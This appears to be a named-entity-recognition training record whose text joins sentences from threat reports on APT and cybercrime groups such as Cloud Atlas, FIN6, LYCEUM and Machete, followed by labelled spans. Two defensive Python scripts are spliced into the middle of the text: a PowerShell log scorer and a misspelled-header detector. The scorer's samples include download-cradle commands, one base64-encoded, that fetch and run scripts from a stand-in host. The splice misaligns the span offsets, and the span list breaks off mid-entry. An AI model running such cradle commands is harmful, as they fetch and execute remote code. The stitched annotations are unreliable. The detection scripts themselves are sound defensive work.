and launches a few other tools to modify the access control lists (ACLs) of all websites running on the affected server . The Windows branch of the Cloud Atlas intrusion set still uses spear-phishing emails to target high profile victims . From the beginning of 2019 until July , we have been able to identify different spear-phishing campaigns related to this threat actor mostly focused on Russia , Central Asia and regions of Ukraine with ongoing military conflicts . We described one of the techniques used by Cloud Atlas in 2017 and our colleagues at Palo Alto Networks also wrote about it in November 2018 . 
The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server . Previously , Cloud Atlas dropped its validator\u201d implant named PowerShower\u201d directly , after exploiting the Microsoft Equation vulnerability CVE-2017-11882 mixed with CVE-2018-0802 . This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage . Cloud Atlas remains very prolific in Eastern Europe and Central Asia . During its recent campaigns , Cloud Atlas used a new polymorphic\u201d infection chain relying no more on PowerShower directly after infection , but executing a polymorphic HTA hosted on a remote server , which is used to drop three different files on the local system . The Gamaredon Group has been actively launching spear-phishing attacks against Ukrainian government and military departments from the mid-2013s . In addition , the anonymous cybersecurity experts referenced in the article connected the malicious Gamaredon Group actors with Russian state-sponsored hackers . In one article published in the Kharkiv Observer \u2013 an independent Ukranian online publication \u2013 an unnamed source stated that even the Ukrainian Presidential Administration has been attacked by malware developed by the Gamaredon Group . Gamaredon Group primarily target Ukrainian organizations and resources using spear-phishing attacks , and they use military or similar documents as bait . Once they have found a victim , they then deploy remote manipulation system binaries (RMS) via self-extracting archives and batch command files . The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content . 
During a recent incident response investigation , our team identified new attacks by the financially motivated attack group ITG08 , also known as FIN6 . More recently , ITG08 has been observed targeting e-commerce environments by injecting malicious code into online checkout pages of compromised websites \u2014 a technique known as online skimming \u2014 thereby stealing payment card data transmitted to the vendor by unsuspecting customers . This tool , a TTP observed in ITG08 attacks since 2018 , is sold on the dark web by an underground malware-as-a-service (MaaS) provider . ITG08 is an organized cybercrime gang that has been active since 2015 , mostly targeting pointof-sale (POS) machines in brick-and-mortar retailers and companies in the hospitality sector in the U.S. and Europe . Past campaigns by ITG08 using the More_eggs backdoor were last reported in February 2019 . Attackers use it to create , expand and cement their foothold in compromised environments . Lastly , ITG08 used Comodo code-signing certificates several times during the course of the campaign . Let\u2019s take a closer look at ITG08\u2019s TTPs that are relevant to the campaign we investigated , starting with its spear phishing and intrusion tactics and covering information on its use of the More_eggs backdoor . Additional capabilities of the More_eggs malware include the download and execution of files and scripts and running commands using cmd.exe . X-Force IRIS determined that the More_eggs backdoor later downloaded additional files , including a signed binary shellcode loader and a signed Dynamic Link Library ( DLL ) , as described below , to create a reverse shell and connect to a remote host . Once the ITG08 established a foothold on the network , they employed WMI and PowerShell techniques to perform network reconnaissance and move laterally within the environment . 
The attackers used this technique to remotely install a Metasploit reverse TCP stager on select systems , subsequently spawning a Meterpreter session and Mimikatz . In addition to the More_eggs malware , ITG08 leveraged in-memory attacks by injecting malicious code , in this case Mimikatz , into legitimate system processes . A recently rising attack tool in ITG08 campaigns has been the More_eggs JScript backdoor . Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . After a successful phishing attack in which users have opened emails and browsed to malicious links , ITG08 attackers install the More_eggs JScript backdoor on user devices alongside several other malware components . Beyond using More_eggs as a backdoor , ITG08 in this campaign also used offensive security tools and PowerShell scripts to carry out the different stages of the attack . After injecting Meterpreter into memory , the attacker had complete control of the infected device . IBM X-Force IRIS has gained insight into ITG08\u2019s intrusion methods , ability to navigate laterally , use of custom and open-source tools , and typical persistence mechanisms . After the phishing email resulted in a successful infiltration , ITG08 used the More_eggs backdoor to gain a foothold and infect additional devices . In addition , enabling PowerShell script block logging and flagging obfuscated script content will help detect and mitigate ITG08\u2019s use of PowerShell to conduct malicious activity . The LYCEUM threat group targets organizations in sectors of strategic national importance , including oil and gas and possibly telecommunications . CTU research indicates that LYCEUM may have been active as early as April 2018 . In May 2019 , the threat group launched a campaign against oil and gas organizations in the Middle East . 
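As an added example (not code from IBM X-Force IRIS or any vendor quoted on this page), the script below shows what the "script block logging plus obfuscation check" recommended for ITG08 looks like in practice: it scores the ScriptBlockText of PowerShell Event ID 4104 records for the markers that the tradecraft described above leaves behind (encoded commands, download cradles, `[char]` concatenation, backtick-split cmdlet names, the Win32 memory APIs that in-memory Meterpreter stagers import) and decodes `-EncodedCommand` payloads before scanning them. The indicator list, weights, alert threshold and all sample blocks are assumptions constructed for this example; the registry policy path is the standard one for enabling script block logging.

```python
"""Triage PowerShell script block logs for obfuscation and in-memory loaders.

Added example; it is not code from IBM X-Force IRIS or any of the reports
quoted on this page. Once script block logging is enabled, every script
PowerShell executes is written to Microsoft-Windows-PowerShell/Operational
as Event ID 4104. The scorer below runs over the ScriptBlockText of such
events and flags blocks that look obfuscated or that resemble a Metasploit
style stager. The sample blocks, the indicator list, the weights and the
alert threshold are all assumptions made for this example.
"""
import base64
import re
from typing import Dict, List

# Policy key whose EnableScriptBlockLogging=1 turns on 4104 events (HKLM hive).
SCRIPT_BLOCK_LOGGING_KEY = (
    r"HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging"
)

# Indicator name -> (regex, weight). Weights are assumptions.
INDICATORS: Dict[str, tuple] = {
    "encoded_command": (re.compile(r"(?i)-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}"), 3),
    "invoke_expression": (re.compile(r"(?i)\b(?:iex|invoke-expression)\b"), 2),
    "base64_decode": (re.compile(r"(?i)FromBase64String"), 2),
    "char_concat": (re.compile(r"(?i)\[char\]\s*\d+"), 2),
    "backtick_in_name": (re.compile(r"[A-Za-z]`[A-Za-z]"), 2),
    "download_cradle": (re.compile(r"(?i)Net\.WebClient|DownloadString|DownloadFile"), 2),
    # Win32 memory/thread APIs show up in PowerShell reflective loaders and stagers.
    "memory_alloc": (re.compile(r"(?i)VirtualAlloc|CreateThread|DllImport"), 3),
    "reflective_load": (re.compile(r"(?i)\[Reflection\.Assembly\]::Load"), 2),
}
ALERT_THRESHOLD = 4


def decode_encoded_command(block: str) -> str:
    """Return the UTF-16LE text behind a -EncodedCommand argument, or '' if absent."""
    m = re.search(r"(?i)-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{40,})", block)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def score_block(block: str) -> Dict[str, object]:
    """Score one ScriptBlockText; a decoded -EncodedCommand payload is scanned too."""
    decoded = decode_encoded_command(block)
    text = block + "\n" + decoded if decoded else block
    hits: List[str] = []
    score = 0
    for name, (rx, weight) in INDICATORS.items():
        if rx.search(text):
            hits.append(name)
            score += weight
    # Heavily obfuscated blocks are dense in punctuation relative to letters/digits.
    symbols = sum(1 for c in block if not c.isalnum() and not c.isspace())
    if len(block) > 40 and symbols / len(block) > 0.35:
        hits.append("symbol_heavy")
        score += 2
    return {"score": score, "hits": hits, "decoded": decoded,
            "suspicious": score >= ALERT_THRESHOLD}


def _encoded(cmd: str) -> str:
    """Build a -EncodedCommand argument the way powershell.exe expects it (UTF-16LE, base64)."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


# Constructed sample ScriptBlockText values (not real telemetry).
SAMPLE_BLOCKS: Dict[str, str] = {
    "benign": r"Get-ChildItem -Path C:\Users | Where-Object { $_.Name -like 'a*' }",
    "cradle": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')",
    "encoded": "powershell.exe -NoP -W Hidden -Enc " + _encoded(
        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"),
    "stager": (
        "$k = [char]107+[char]51; "
        "[DllImport(\"kernel32.dll\")] public static extern IntPtr VirtualAlloc("
        "IntPtr a, uint s, uint t, uint p); "
        "In`voke-Expression $k"
    ),
}


def triage(blocks: Dict[str, str]) -> Dict[str, Dict[str, object]]:
    """Score every block and return the results keyed by the block's label."""
    return {label: score_block(text) for label, text in blocks.items()}


if __name__ == "__main__":
    for label, result in triage(SAMPLE_BLOCKS).items():
        print(f"{label:8s} score={result['score']:2d} "
              f"suspicious={result['suspicious']} hits={result['hits']}")
```

The decode step matters more than any single regex: an attacker who hides a download cradle behind `-EncodedCommand` defeats a scanner that only looks at the outer command line, and a plain `Get-ChildItem` block scores zero, which keeps the rule usable on a busy fleet.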
This campaign followed a sharp uptick in development and testing of their toolkit against a public multivendor malware scanning service in February 2019 . Stylistically , the observed tradecraft resembles activity from groups such as COBALT GYPSY ( which is related to OilRig , Crambus , and APT34 ) and COBALT TRINITY ( also known as Elfin and APT33 ) . When CTU researchers first published information about LYCEUM to Secureworks Threat Intelligence clients , no public documentation on the group existed . Using compromised accounts , LYCEUM sends spearphishing emails with malicious Excel attachments to deliver the DanBot malware , which subsequently deploys post-intrusion tools . The developer consistently used \u201cAccept-Enconding\u201d ( note the extra \u2018n\u2019 ) in all DanBot samples analyzed by CTU researchers . Get-LAPSP.ps1 is a PowerShell script that gathers account information from Active Directory via LDAP . LYCEUM deployed this tool via DanBot shortly after gaining initial access to a compromised environment . LYCEUM delivers weaponized maldocs via spearphishing from the compromised accounts to the targeted executives , human resources (HR) staff , and IT personnel . The lure\u2019s focus on training aligns with LYCEUM\u2019s targeting of executives , HR staff , and IT personnel . Despite the initial perception that the maldoc sample was intended for ICS or OT staff , LYCEUM has not demonstrated an interest in those environments . However , CTU researchers cannot dismiss the possibility that LYCEUM could seek access to OT environments after establishing robust access to the IT environment . LYCEUM is an emerging threat to energy organizations in the Middle East , but organizations should not assume that future targeting will be limited to this sector . Aside from deploying novel malware , LYCEUM\u2019s activity demonstrates capabilities CTU researchers have observed from other threat groups and reinforces the value of a few key controls . 
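The misspelled DanBot header is a network-level fingerprint, and the check generalises: any request header that is not a standard name but sits one or two edits away from one deserves a look, because hand-written HTTP clients in malware tend to carry exactly this kind of typo. The following added example (not Secureworks CTU code) parses raw request heads, as carved from a proxy log or a pcap, and reports near-miss headers using Levenshtein distance; the known-header list, the distance threshold and the two sample requests are constructed assumptions.

```python
"""Flag HTTP request headers that are near-misses of standard header names.

Added example; not Secureworks CTU code. Every DanBot sample CTU analysed
sent "Accept-Enconding" instead of "Accept-Encoding". Hand-rolled HTTP
clients in malware often carry such typos, and a near-miss check over
proxy logs or requests carved from pcap catches the whole family without a
per-sample signature. The request samples are constructed; the known-header
list and the distance threshold are assumptions.
"""
from typing import Dict, List, Tuple

# Request headers a browser or mainstream HTTP library emits (assumed, not exhaustive).
KNOWN_HEADERS: List[str] = sorted({
    "host", "user-agent", "accept", "accept-encoding", "accept-language",
    "connection", "content-type", "content-length", "cookie", "referer",
    "cache-control", "pragma", "authorization", "upgrade-insecure-requests",
    "if-modified-since", "if-none-match", "origin", "x-requested-with",
})


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance with the usual two-row dynamic programme."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,              # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def parse_request_head(raw: str) -> Tuple[str, List[Tuple[str, str]]]:
    """Split a raw HTTP request head into its request line and (name, value) headers."""
    lines = raw.replace("\r\n", "\n").split("\n")
    headers: List[Tuple[str, str]] = []
    for line in lines[1:]:
        if not line.strip():
            break  # the empty line terminates the head
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers


def near_miss_headers(raw: str, max_distance: int = 2) -> List[Dict[str, object]]:
    """Return headers that are not standard names but sit within max_distance of one."""
    _, headers = parse_request_head(raw)
    findings: List[Dict[str, object]] = []
    for name, _ in headers:
        lname = name.lower()
        if lname in KNOWN_HEADERS:
            continue
        closest = min(KNOWN_HEADERS, key=lambda k: edit_distance(lname, k))
        d = edit_distance(lname, closest)
        if d <= max_distance:
            findings.append({"header": name, "resembles": closest, "distance": d})
    return findings


# Constructed request heads (not captured traffic). The first mimics the DanBot typo.
SAMPLE_REQUESTS: Dict[str, str] = {
    "danbot_like": (
        "GET /update.php HTTP/1.1\r\n"
        "Host: example.invalid\r\n"
        "User-Agent: Mozilla/5.0\r\n"
        "Accept-Enconding: gzip, deflate\r\n"
        "Connection: Keep-Alive\r\n\r\n"
    ),
    "browser": (
        "GET / HTTP/1.1\r\n"
        "Host: example.invalid\r\n"
        "User-Agent: Mozilla/5.0\r\n"
        "Accept-Encoding: gzip, deflate\r\n"
        "Accept-Language: en-US\r\n"
        "X-Custom-Token: abc\r\n\r\n"
    ),
}

if __name__ == "__main__":
    for label, raw in SAMPLE_REQUESTS.items():
        print(label, near_miss_headers(raw))
```

A genuinely custom header such as `X-Custom-Token` is far from every standard name and is left alone; only names that look like a failed attempt at a standard header are reported, which is the property that makes the check cheap to run at scale.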
Password spraying , DNS tunneling , social engineering , and abuse of security testing frameworks are common tactics , particularly from threat groups operating in the Middle East . The group behind these attacks has stolen gigabytes of confidential documents , mostly from military organizations . Machete is still very active at the time of this publication , regularly introducing changes to its malware , infrastructure and spearphishing campaigns . ESET has been tracking a new version of Machete (the group\u2019s Python-based toolset) that was first seen in April 2018 . This extends to other countries in Latin America , with the Ecuadorean military being another organization highly targeted with the Machete malware . Their long run of attacks , focused on Latin American countries , has allowed them to collect intelligence and refine their tactics over the years . Machete is interested in files that describe navigation routes and positioning using military grids . The Machete group sends very specific emails directly to its victims , and these change from target to target . The Machete group is very active and has introduced several changes to its malware since a new version was released in April 2018 . Previous versions were described by Kaspersky in 2014 and Cylance in 2017 . Since August 2018 , the Machete components have been delivered with an extra layer of obfuscation . The GoogleUpdate.exe component is responsible for communicating with the remote C&C server . ESET has been tracking this threat for months and has observed several changes , sometimes within weeks . Through this C&C channel , the malware can have its configuration , malicious binaries and file listings updated , and can also download and execute other binaries . The presence of code to exfiltrate data to removable drives when there is physical access to a compromised computer may indicate that Machete operators could have a presence in one of the targeted countries , although we cannot be certain . 
This group is very active and continues to develop new features for its malware and to implement infrastructure changes in 2019 . Machete's long run of attacks , focused on Latin American countries , has allowed them to collect intelligence and refine their tactics over the years . ESET researchers have detected an ongoing , highly targeted campaign , with a majority of the targets being military organizations . The group behind Machete uses effective spearphishing techniques . First described by Kaspersky in 2014 [1] and later by Cylance in 2017 [2] , Machete is a piece of malware found to be targeting high profile individuals and organizations in Latin American countries . In 2018 Machete reappeared with new code and new features . As of June 2019 , ESET has seen over 50 victims being actively spied upon by Machete , with more than half of them being computers belonging to the Venezuelan military forces . Machete has Latin American targets and has been developed by a Spanish-speaking group , presumably from a LATAM country . Machete was active and constantly working on very effective spearphishing campaigns . In some cases , Machete tricks new victims by sending real documents that had been stolen on the very same day . Machete relies on spearphishing to compromise its targets . They seem to have specialized knowledge about military operations , as they are focused on stealing specific files such as those that describe navigation routes . Attackers take advantage of that , along with their knowledge of military jargon and etiquette , to craft very convincing phishing emails . Operators behind Machete apparently already have information about individuals or organizations of interest to them in Latin America , how to reach them , and how best to trick them into getting compromised . Since the end of March up until the end of May 2019 , ESET observed that there were more than 50 victimized computers actively communicating with the C&C server . 
This extends to other countries in Latin America , with the Ecuadorean military being another organization highly targeted by Machete . Machete is malware that has been developed and is actively maintained by a Spanish-speaking group . OceanLotus has been active since 2012 , carrying out attacks against sensitive targets in China , and is one of the most active APT groups targeting mainland China in recent years . By introducing small changes to their code and infrastructure , the group has bypassed several security products . OceanLotus releases malicious sub-packages in the background , receives remote control commands , and steals users\u2019 private information such as SMS messages , contacts , call records , geographic locations , and browser records . It also secretly downloads APKs , records audio and video , and uploads the collected private information to its server , leaking the users\u2019 privacy . After the code leak , the CEO of HackingTeam stated that the leaked code was only a small part , which is consistent with the facts ; this also shows that cyber-arms merchants have lowered the barrier to APT attacks to some extent , adding uncertainty to cyber attacks . This report includes details related to the major hacking targets of the SectorJ04 group in 2019 , how those targets were hacked , characteristics of their hacking activities this year and recent cases of the SectorJ04 group\u2019s hacking . In 2019 , the SectorJ04 group expanded its hacking activities to cover various industrial sectors located across Southeast Asia and East Asia , and is changing the pattern of its attacks from targeted attacks to searching for random victims . The SectorJ04 group has maintained the scope of its existing hacking activities while expanding them to companies in various industrial sectors located in East Asia and Southeast Asia . 
There was a significant increase in SectorJ04's hacking activities in 2019 , especially those targeting South Korea . They mainly utilize spam email to deliver their backdoor to the infected system , which can then execute additional commands received from the attacker\u2019s server . We saw SectorJ04 group activity in Germany , Indonesia , the United States , Taiwan and India . The SectorJ04 group mainly utilizes a spear phishing email with MS Word or Excel files attached ; the document file downloads a Microsoft Installer (MSI) package from the attacker server and uses it to install a backdoor on the infected system . The SectorJ04 group\u2019s preexisting targets were financial institutions located in North America and Europe , or general companies such as retail and manufacturing , but they recently expanded their areas of activity to include the medical , pharmaceutical , media , energy and manufacturing industries . The SectorJ04 group mainly used their own backdoors , ServHelper and FlawedAmmy RAT , for hacking .", "spans": [{"start": 13, "end": 22, "label": "Organization"}, {"start": 38, "end": 49, "label": "Organization"}, {"start": 159, "end": 164, "label": "Organization"}, {"start": 196, "end": 214, "label": "System"}, {"start": 215, "end": 220, "label": "System"}, {"start": 357, "end": 362, "label": "Organization"}, {"start": 493, "end": 498, "label": "Organization"}, {"start": 692, "end": 699, "label": "Organization"}, {"start": 737, "end": 756, "label": "Organization"}, {"start": 793, "end": 802, "label": "Indicator"}, {"start": 914, "end": 924, "label": "Indicator"}, {"start": 1056, "end": 1062, "label": "System"}, {"start": 1121, "end": 1130, "label": "Organization"}, {"start": 1160, "end": 1169, "label": "Organization"}, {"start": 1278, "end": 1294, "label": "Organization"}, {"start": 1525, "end": 1532, "label": "Organization"}, {"start": 1711, "end": 1721, "label": "Organization"}, {"start": 1771, "end": 1778, "label": 
"Vulnerability"}, {"start": 1786, "end": 1792, "label": "System"}, {"start": 1811, "end": 1825, "label": "Vulnerability"}, {"start": 1833, "end": 1842, "label": "Indicator"}, {"start": 1847, "end": 1857, "label": "Indicator"}, {"start": 2111, "end": 2121, "label": "Indicator"}, {"start": 2270, "end": 2277, "label": "Vulnerability"}, {"start": 2282, "end": 2288, "label": "System"}, {"start": 2307, "end": 2321, "label": "Vulnerability"}, {"start": 2358, "end": 2366, "label": "Organization"}, {"start": 2424, "end": 2433, "label": "Malware"}, {"start": 2489, "end": 2508, "label": "Malware"}, {"start": 2555, "end": 2560, "label": "Organization"}, {"start": 2571, "end": 2581, "label": "Malware"}, {"start": 2586, "end": 2591, "label": "System"}, {"start": 2665, "end": 2670, "label": "System"}, {"start": 2689, "end": 2697, "label": "Indicator"}, {"start": 2809, "end": 2826, "label": "Indicator"}, {"start": 2918, "end": 2925, "label": "Organization"}, {"start": 2926, "end": 2936, "label": "Malware"}, {"start": 3209, "end": 3216, "label": "Organization"}, {"start": 3399, "end": 3407, "label": "Organization"}, {"start": 3429, "end": 3439, "label": "Organization"}, {"start": 3487, "end": 3499, "label": "Organization"}, {"start": 3569, "end": 3585, "label": "Organization"}, {"start": 3602, "end": 3613, "label": "Organization"}, {"start": 3732, "end": 3742, "label": "Organization"}, {"start": 3762, "end": 3775, "label": "Organization"}, {"start": 3804, "end": 3814, "label": "Organization"}, {"start": 3840, "end": 3850, "label": "Organization"}, {"start": 3998, "end": 4000, "label": "Indicator"}, {"start": 4049, "end": 4059, "label": "Organization"}, {"start": 4074, "end": 4093, "label": "Organization"}, {"start": 4151, "end": 4159, "label": "Organization"}, {"start": 4246, "end": 4256, "label": "Organization"}, {"start": 4402, "end": 4412, "label": "Organization"}, {"start": 4546, "end": 4553, "label": "Organization"}, {"start": 4669, "end": 4674, "label": "System"}, {"start": 
4769, "end": 4799, "label": "Organization"}, {"start": 4855, "end": 4865, "label": "Organization"}, {"start": 4936, "end": 4949, "label": "Malware"}, {"start": 5018, "end": 5027, "label": "Organization"}, {"start": 5032, "end": 5049, "label": "Organization"}, {"start": 5127, "end": 5140, "label": "Indicator"}, {"start": 5163, "end": 5172, "label": "Organization"}, {"start": 5301, "end": 5312, "label": "Organization"}, {"start": 5336, "end": 5349, "label": "Malware"}, {"start": 5461, "end": 5470, "label": "Organization"}, {"start": 5481, "end": 5494, "label": "Malware"}, {"start": 5583, "end": 5606, "label": "Organization"}, {"start": 5685, "end": 5698, "label": "Indicator"}, {"start": 5725, "end": 5741, "label": "System"}, {"start": 5946, "end": 5959, "label": "Indicator"}, {"start": 5963, "end": 5978, "label": "Indicator"}, {"start": 5985, "end": 5989, "label": "Indicator"}, {"start": 6120, "end": 6125, "label": "Organization"}, {"start": 6138, "end": 6145, "label": "Vulnerability"}, {"start": 6146, "end": 6159, "label": "Vulnerability"}, {"start": 6188, "end": 6201, "label": "Vulnerability"}, {"start": 6205, "end": 6212, "label": "System"}, {"start": 6324, "end": 6340, "label": "Vulnerability"}, {"start": 6341, "end": 6348, "label": "Vulnerability"}, {"start": 6355, "end": 6363, "label": "Organization"}, {"start": 6522, "end": 6529, "label": "System"}, {"start": 6544, "end": 6555, "label": "Organization"}, {"start": 6596, "end": 6602, "label": "System"}, {"start": 6910, "end": 6921, "label": "Organization"}, {"start": 6952, "end": 6961, "label": "Organization"}, {"start": 7014, "end": 7027, "label": "Indicator"}, {"start": 7089, "end": 7096, "label": "Vulnerability"}, {"start": 7120, "end": 7127, "label": "Vulnerability"}, {"start": 7132, "end": 7139, "label": "System"}, {"start": 7156, "end": 7169, "label": "Vulnerability"}, {"start": 7172, "end": 7185, "label": "Vulnerability"}, {"start": 7190, "end": 7203, "label": "Vulnerability"}, {"start": 7217, "end": 
7225, "label": "Organization"}, {"start": 7279, "end": 7290, "label": "Organization"}, {"start": 7373, "end": 7382, "label": "Organization"}, {"start": 7406, "end": 7420, "label": "Vulnerability"}, {"start": 7432, "end": 7445, "label": "Vulnerability"}, {"start": 7497, "end": 7508, "label": "Organization"}, {"start": 7552, "end": 7563, "label": "Organization"}, {"start": 7653, "end": 7664, "label": "Organization"}, {"start": 7893, "end": 7908, "label": "Organization"}, {"start": 7978, "end": 7988, "label": "Organization"}, {"start": 7993, "end": 8001, "label": "Organization"}, {"start": 8135, "end": 8150, "label": "Organization"}, {"start": 8342, "end": 8369, "label": "Organization"}, {"start": 8416, "end": 8431, "label": "Organization"}, {"start": 8434, "end": 8449, "label": "Organization"}, {"start": 8477, "end": 8490, "label": "Organization"}, {"start": 8569, "end": 8578, "label": "Malware"}, {"start": 8594, "end": 8598, "label": "Organization"}, {"start": 8674, "end": 8679, "label": "Malware"}, {"start": 8749, "end": 8756, "label": "Indicator"}, {"start": 8795, "end": 8801, "label": "System"}, {"start": 8817, "end": 8830, "label": "Vulnerability"}, {"start": 8992, "end": 8997, "label": "Organization"}, {"start": 9014, "end": 9018, "label": "Organization"}, {"start": 9037, "end": 9042, "label": "Organization"}, {"start": 9071, "end": 9094, "label": "Organization"}, {"start": 9334, "end": 9339, "label": "Organization"}, {"start": 9442, "end": 9447, "label": "Organization"}, {"start": 9579, "end": 9588, "label": "Organization"}, {"start": 9610, "end": 9628, "label": "Organization"}, {"start": 9672, "end": 9677, "label": "Organization"}, {"start": 9688, "end": 9706, "label": "Malware"}, {"start": 9745, "end": 9754, "label": "Organization"}, {"start": 9846, "end": 9851, "label": "Organization"}, {"start": 9857, "end": 9889, "label": "Malware"}, {"start": 9968, "end": 9975, "label": "Organization"}, {"start": 10131, "end": 10149, "label": "Indicator"}, {"start": 
10183, "end": 10200, "label": "Indicator"}, {"start": 10284, "end": 10291, "label": "Indicator"}, {"start": 10294, "end": 10306, "label": "Organization"}, {"start": 10327, "end": 10345, "label": "Indicator"}, {"start": 10438, "end": 10458, "label": "System"}, {"start": 10461, "end": 10464, "label": "System"}, {"start": 10556, "end": 10561, "label": "Organization"}, {"start": 10616, "end": 10619, "label": "Malware"}, {"start": 10624, "end": 10634, "label": "Malware"}, {"start": 10728, "end": 10737, "label": "Organization"}, {"start": 10799, "end": 10802, "label": "Indicator"}, {"start": 10908, "end": 10917, "label": "Malware"}, {"start": 10928, "end": 10933, "label": "Organization"}, {"start": 11005, "end": 11013, "label": "Malware"}, {"start": 11084, "end": 11089, "label": "Organization"}, {"start": 11113, "end": 11139, "label": "Malware"}, {"start": 11142, "end": 11150, "label": "Indicator"}, {"start": 11309, "end": 11315, "label": "System"}, {"start": 11349, "end": 11354, "label": "Organization"}, {"start": 11377, "end": 11403, "label": "Malware"}, {"start": 11478, "end": 11487, "label": "Malware"}, {"start": 11504, "end": 11509, "label": "Organization"}, {"start": 11537, "end": 11561, "label": "Malware"}, {"start": 11566, "end": 11584, "label": "Malware"}, {"start": 11681, "end": 11689, "label": "Organization"}, {"start": 11736, "end": 11752, "label": "Organization"}, {"start": 11777, "end": 11784, "label": "Organization"}, {"start": 11867, "end": 11872, "label": "Malware"}, {"start": 11977, "end": 11982, "label": "Organization"}, {"start": 11992, "end": 12010, "label": "Malware"}, {"start": 12088, "end": 12098, "label": "System"}, {"start": 12172, "end": 12179, "label": "Organization"}, {"start": 12187, "end": 12197, "label": "Malware"}, {"start": 12234, "end": 12240, "label": "Organization"}, {"start": 12290, "end": 12319, "label": "Organization"}, {"start": 12332, "end": 12343, "label": "Organization"}, {"start": 12357, "end": 12375, "label": "Organization"}, 
{"start": 12378, "end": 12381, "label": "Organization"}, {"start": 12406, "end": 12412, "label": "Organization"}, {"start": 12799, "end": 12811, "label": "Organization"}, {"start": 12833, "end": 12839, "label": "Organization"}, {"start": 12842, "end": 12849, "label": "Organization"}, {"start": 12856, "end": 12861, "label": "Organization"}, {"start": 12866, "end": 12880, "label": "Organization"}, {"start": 12895, "end": 12900, "label": "Organization"}, {"start": 12905, "end": 12910, "label": "Organization"}, {"start": 12918, "end": 12921, "label": "Organization"}, {"start": 12968, "end": 12974, "label": "Organization"}, {"start": 13096, "end": 13102, "label": "Organization"}, {"start": 13122, "end": 13128, "label": "System"}, {"start": 13221, "end": 13241, "label": "Malware"}, {"start": 13322, "end": 13328, "label": "Indicator"}, {"start": 13349, "end": 13352, "label": "Organization"}, {"start": 13367, "end": 13380, "label": "Malware"}, {"start": 13386, "end": 13403, "label": "Malware"}, {"start": 13470, "end": 13476, "label": "Organization"}, {"start": 13500, "end": 13506, "label": "Malware"}, {"start": 13575, "end": 13581, "label": "Organization"}, {"start": 13602, "end": 13609, "label": "Malware"}, {"start": 13770, "end": 13778, "label": "Organization"}, {"start": 13792, "end": 13802, "label": "Organization"}, {"start": 13805, "end": 13813, "label": "Organization"}, {"start": 13820, "end": 13832, "label": "Organization"}, {"start": 13875, "end": 13881, "label": "Malware"}, {"start": 13906, "end": 13909, "label": "Organization"}, {"start": 13913, "end": 13921, "label": "Organization"}, {"start": 13924, "end": 13930, "label": "Organization"}, {"start": 13998, "end": 14001, "label": "Organization"}, {"start": 14054, "end": 14060, "label": "Organization"}, {"start": 14155, "end": 14161, "label": "Organization"}, {"start": 14187, "end": 14207, "label": "Organization"}, {"start": 14357, "end": 14365, "label": "Organization"}, {"start": 14401, "end": 14404, "label": 
"Organization"}, {"start": 14649, "end": 14655, "label": "Organization"}, {"start": 14779, "end": 14787, "label": "Organization"}, {"start": 14788, "end": 14801, "label": "Organization"}, {"start": 14804, "end": 14811, "label": "Organization"}, {"start": 14904, "end": 14911, "label": "Malware"}, {"start": 14959, "end": 14963, "label": "Organization"}, {"start": 14999, "end": 15006, "label": "Organization"}, {"start": 15020, "end": 15032, "label": "System"}, {"start": 15138, "end": 15157, "label": "Organization"}, {"start": 15210, "end": 15217, "label": "Organization"}, {"start": 15228, "end": 15233, "label": "Organization"}, {"start": 15377, "end": 15384, "label": "Organization"}, {"start": 15413, "end": 15439, "label": "Organization"}, {"start": 15483, "end": 15490, "label": "Organization"}, {"start": 15517, "end": 15523, "label": "System"}, {"start": 15595, "end": 15602, "label": "Organization"}, {"start": 15723, "end": 15740, "label": "Indicator"}, {"start": 15759, "end": 15768, "label": "Organization"}, {"start": 15781, "end": 15788, "label": "Organization"}, {"start": 15823, "end": 15830, "label": "Organization"}, {"start": 15903, "end": 15919, "label": "Indicator"}, {"start": 15979, "end": 15982, "label": "System"}, {"start": 15992, "end": 15996, "label": "Organization"}, {"start": 16113, "end": 16120, "label": "Indicator"}, {"start": 16382, "end": 16389, "label": "Organization"}, {"start": 16618, "end": 16627, "label": "Organization"}, {"start": 16771, "end": 16775, "label": "Organization"}, {"start": 16879, "end": 16887, "label": "Organization"}, {"start": 16921, "end": 16928, "label": "Organization"}, {"start": 16990, "end": 16999, "label": "Organization"}, {"start": 17027, "end": 17034, "label": "Organization"}, {"start": 17049, "end": 17056, "label": "Organization"}, {"start": 17182, "end": 17189, "label": "Organization"}, {"start": 17252, "end": 17256, "label": "Organization"}, {"start": 17311, "end": 17318, "label": "Organization"}, {"start": 17393, 
